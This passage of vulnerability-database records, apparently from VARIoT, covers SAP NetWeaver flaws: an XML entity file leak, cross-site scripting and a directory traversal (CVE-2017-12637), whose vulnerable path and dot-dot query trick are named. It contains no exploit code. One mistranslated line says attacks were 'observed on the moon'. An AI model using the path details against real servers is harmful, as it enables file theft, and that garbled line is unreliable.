"data": "SAP NetWeaver is prone to multiple unspecified remote vulnerabilities, including:\n- Multiple information-disclosure vulnerabilities.\n- A NULL-pointer dereference vulnerability.\n- Multiple heap-overflow vulnerabilities.\n- A denial-of-service vulnerability.\nAttackers can exploit these issues to execute code within the context of the affected server, cause denial-of-service conditions, and obtain potentially sensitive information.",
"sources": [
{
"db": "BID",
"id": "36252"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "36252",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "36252"
}
]
},
"id": "VAR-200909-0698",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:56:42.750000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.3,
"url": "http://intevydis.com/company.shtml"
}
],
"sources": [
{
"db": "BID",
"id": "36252"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "36252"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-09-03T00:00:00",
"db": "BID",
"id": "36252"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-09-03T22:12:00",
"db": "BID",
"id": "36252"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "36252"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Multiple Unspecified Remote Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "36252"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "36252"
}
],
"trust": 0.3
}
}
var-201302-0420
Vulnerability from variot
SAP NetWeaver is the technical foundation of SAP's integrated technology platform and all SAP applications since SAP Business Suite. SAP NetWeaver 7.02 and other versions have errors in the XML parser within the SPML service when validating XML requests and can be exploited to leak local files. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: SAP NetWeaver SPML XML Entity References Information Disclosure Vulnerability
SECUNIA ADVISORY ID: SA51573
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51573/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51573
RELEASE DATE: 2013-01-24
DISCUSS ADVISORY: http://secunia.com/advisories/51573/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/51573/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=51573
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: ERPScan has reported a vulnerability in SAP NetWeaver, which can be exploited by malicious people to disclose certain sensitive information. disclose local files.
The vulnerability is reported in version 7.02. Other versions may also be affected.
SOLUTION: Apply SAP Security Note 1621534.
PROVIDED AND/OR DISCOVERED BY: Alexey Tyurin, ERPScan.
ORIGINAL ADVISORY: DSECRG-12-043: http://erpscan.com/advisories/dsecrg-12-043-sap-netweaver-spml-xml-external-entity/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201302-0420",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00706"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Secunia",
"sources": [
{
"db": "PACKETSTORM",
"id": "119824"
}
],
"trust": 0.1
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation of SAP\u0027s integrated technology platform and all SAP applications since SAP Business Suite. SAP NetWeaver 7.02 and other versions have errors in the XML parser within the SPML service when validating XML requests and can be exploited to leak local files. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver SPML XML Entity References Information Disclosure\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA51573\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/51573/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51573\n\nRELEASE DATE:\n2013-01-24\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/51573/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/51573/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51573\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nERPScan has reported a vulnerability in SAP NetWeaver, which can be\nexploited by malicious people to disclose certain sensitive\ninformation. \ndisclose local files. \n\nThe vulnerability is reported in version 7.02. Other versions may\nalso be affected. \n\nSOLUTION:\nApply SAP Security Note 1621534. \n\nPROVIDED AND/OR DISCOVERED BY:\nAlexey Tyurin, ERPScan. \n\nORIGINAL ADVISORY:\nDSECRG-12-043:\nhttp://erpscan.com/advisories/dsecrg-12-043-sap-netweaver-spml-xml-external-entity/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00706"
},
{
"db": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "119824"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-00706",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "51573",
"trust": 0.7
},
{
"db": "IVD",
"id": "FE425F52-1F38-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "119824",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00706"
},
{
"db": "PACKETSTORM",
"id": "119824"
}
]
},
"id": "VAR-201302-0420",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00706"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00706"
}
]
},
"last_update_date": "2022-05-17T22:41:47.388000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver SPML XML Entity Reference Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/31412"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00706"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.7,
"url": "http://secunia.com/advisories/51573/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51573"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-043-sap-netweaver-spml-xml-external-entity/"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51573/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00706"
},
{
"db": "PACKETSTORM",
"id": "119824"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00706"
},
{
"db": "PACKETSTORM",
"id": "119824"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-05T00:00:00",
"db": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d"
},
{
"date": "2013-02-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00706"
},
{
"date": "2013-01-25T03:09:07",
"db": "PACKETSTORM",
"id": "119824"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00706"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver SPML XML Entity Reference Information Disclosure Vulnerability",
"sources": [
{
"db": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00706"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Information leakage",
"sources": [
{
"db": "IVD",
"id": "fe425f52-1f38-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201709-1262
Vulnerability from variot
SAP NetWeaver is prone to an cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-1262",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100714"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100714"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.",
"sources": [
{
"db": "BID",
"id": "100714"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100714",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100714"
}
]
},
"id": "VAR-201709-1262",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:43:10.730000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2365450"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/09/12/sap-security-patch-day-september-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100714"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100714"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100714"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100714"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100714"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver \u0027SLC Sell Side Registration Page\u0027 Cross Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "100714"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100714"
}
],
"trust": 0.3
}
}
var-201708-0889
Vulnerability from variot
Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. Attacks on this vulnerability 2017 Year 8 Observed on the moon. Vendors have confirmed this vulnerability SAP Security Note 2486657 It is released as.Information may be obtained
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-0889",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.50"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"cve": "CVE-2017-12637",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-12637",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
